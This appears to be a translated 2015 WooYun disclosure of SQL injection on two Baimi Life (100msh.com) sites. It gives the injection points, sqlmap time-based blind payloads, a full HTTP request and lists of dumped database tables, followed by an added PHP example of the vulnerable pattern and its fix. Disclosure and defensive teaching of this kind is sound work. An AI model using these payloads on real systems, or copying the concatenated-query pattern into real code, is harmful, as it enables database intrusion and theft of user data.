
Vulnerability summary

Defect ID: wooyun-2015-0104645

Title: SQL injection vulnerability on multiple Baimi Life (百米生活) sites

Vendor: Baimi Life (百米生活)

Author: crypt

Submitted: 2015-03-31 15:19

Fix time: 2015-05-15 15:20

Published: 2015-05-15 15:20

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 12

Status: vendor could not be reached, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help, contact [email protected]




Vulnerability details

Disclosure status:

2015-03-31: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2015-05-15: Vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

Detailed description:

Baimi Life (百米生活) deploys free commercial Wi-Fi to build a localised, community-based e-commerce service platform in cities across China. It offers merchants product promotion, brand publicity, merchant management and cost-control services, and gives consumers information on food, clothing, housing, travel and entertainment near their community, while the free Wi-Fi opens up a new mobile-internet lifestyle.
The sites shop.100msh.com and m.100msh.com have SQL injection vulnerabilities, and the databases can be dumped.

shop.100msh.com
Injection point: http://shop.100msh.com/index/set_area?area_id=57
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: area_id (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: area_id=57' AND (SELECT * FROM (SELECT(SLEEP(5)))MUWQ) AND 'rStO'='rStO
---
back-end DBMS: MySQL >= 5.0.0
Database: 100msh_admin
Table: anl_admin_users
[5 entries]
m.100msh.com
X-Forwarded-For header injection

GET /ajax/store.php?id=7306 HTTP/1.1
Host: m.100msh.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: application/json
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://m.100msh.com/
Cookie: PHPSESSID=f8usqpc5bnae0763u5svm6cj47; cityName=%E6%B7%B1%E5%9C%B3%E5%B8%82; is_navigator=0; Hm_lvt_217ce928b5e91bb9e52243ad0d2b8d47=1427332396; Hm_lpvt_217ce928b5e91bb9e52243ad0d2b8d47=1427334722; _ga=GA1.2.137151480.1427332397; _gat=1
X-Forwarded-For: 8.8.8.8*
Connection: keep-alive


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: X-Forwarded-For #1* ((custom) HEADER)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: 8.8.8.8' AND (SELECT * FROM (SELECT(SLEEP(5)))wsmC) AND 'iDga'='iDga
---
back-end DBMS: MySQL >= 5.0.0
Database: 100msh_partner
[41 tables]
+----------------------------------+
| anl_accessrights |
| anl_admin_access_token |
| anl_admin_minUsers_tmp |
| anl_admin_pos |
| anl_admin_users |
| anl_admin_users_bak |
| anl_login_log |
| anl_partner |
| anl_partner_addition |
| anl_partner_cateqory |
| anl_partner_credit_operation_log |
| anl_partner_credit_points |
| anl_partner_ctag |
| anl_partner_ctag_rel |
| anl_partner_gallery |
| anl_partner_info_aueit |
| anl_partner_level |
| anl_partner_level_rule |
| anl_partner_linyi_osg |
| anl_partner_log |
| anl_partner_peportqd |
| anl_partner_policy |
| anl_partner_policy_domp |
| anl_partner_policy_level |
| anl_partner_prefereqtial |
| anl_partner_prefereqtial_count |
| anl_partner_search_config |
| anl_partner_search_keyword |
| anl_partner_tag_rem |
| anl_partner_tpl_cfg |
| anl_partner_user_search_keyword |
| anl_partner_views |
| anl_partner_views_num_info_all |
| anl_partner_views_nuo_info |
| anl_posadcess |
| anl_positions |
| anl_statecity |
| anl_tag |
| anl_tmp_cmp_msg_rel |
| anl_tmp_wx_partner_msg |
| anl_watermark |
+----------------------------------+

Proof of vulnerability:

back-end DBMS: MySQL >= 5.0.0
Database: 100msh_admin
Table: anl_admin_users
[5 entries]
back-end DBMS: MySQL >= 5.0.0
Database: 100msh_partner
[41 tables]

Suggested fix:

Escape and filter input.
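As an added illustration of the fix (this is example code, not code from the 100msh site or from the report), the following shows the pattern the report describes for both findings, the area_id query parameter and the X-Forwarded-For header being concatenated into SQL, next to a hardened version that validates the value and binds it as a parameter. Table names, column names and the DSN are assumptions.

```php
<?php
// Added example, not code from the 100msh site or the original report.
// Shows request input concatenated into SQL next to a hardened version.
// Table names, column names and the DSN are assumptions.

// VULNERABLE pattern: area_id from the query string is interpolated straight into SQL.
function setAreaVulnerable(PDO $db, array $get): array
{
    $areaId = $get['area_id'] ?? '';                          // attacker-controlled string
    $rows = $db->query("SELECT id, name FROM area WHERE id = '$areaId'");
    return $rows ? $rows->fetchAll(PDO::FETCH_ASSOC) : [];
}

// HARDENED: validate the type first, then bind the value as a parameter so it
// can never be parsed as SQL, whatever it contains.
function setAreaSafe(PDO $db, array $get): ?array
{
    $areaId = filter_var($get['area_id'] ?? null, FILTER_VALIDATE_INT,
                         ['options' => ['min_range' => 1]]);
    if ($areaId === false) {
        http_response_code(400);                                // reject, do not "escape"
        return null;
    }
    $stmt = $db->prepare('SELECT id, name FROM area WHERE id = :id');
    $stmt->execute([':id' => $areaId]);
    return $stmt->fetch(PDO::FETCH_ASSOC) ?: null;
}

// X-Forwarded-For is a request header any client can write, so it is untrusted
// input like any query parameter. Accept only a well-formed IP address, and only
// the rightmost hop (the one appended by your own proxy); otherwise use REMOTE_ADDR.
function clientIpForLogging(array $server): string
{
    $hops = array_map('trim', explode(',', $server['HTTP_X_FORWARDED_FOR'] ?? ''));
    $candidate = end($hops);
    if (filter_var($candidate, FILTER_VALIDATE_IP) !== false) {
        return $candidate;
    }
    return $server['REMOTE_ADDR'] ?? '0.0.0.0';
}

// HARDENED logging of a store view: the validated IP is still bound, never concatenated.
function logStoreView(PDO $db, int $storeId, string $ip): void
{
    $stmt = $db->prepare('INSERT INTO store_views (store_id, ip, seen_at) VALUES (:sid, :ip, NOW())');
    $stmt->execute([':sid' => $storeId, ':ip' => $ip]);
}

// Wiring (assumed DSN); emulated prepares are disabled so binding happens server-side:
// $db = new PDO('mysql:host=localhost;dbname=app', 'user', 'pass',
//     [PDO::ATTR_EMULATE_PREPARES => false, PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
// logStoreView($db, (int)($_GET['id'] ?? 0), clientIpForLogging($_SERVER));
```

Escaping alone is fragile because it depends on the connection charset and on every call site remembering to do it; type validation plus bound parameters removes the injection class regardless of how the header or parameter is crafted.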

Copyright notice: when reproducing, please credit the source: crypt@WooYun


Vulnerability response

Vendor response:

The vendor could not be reached, or the vendor actively declined.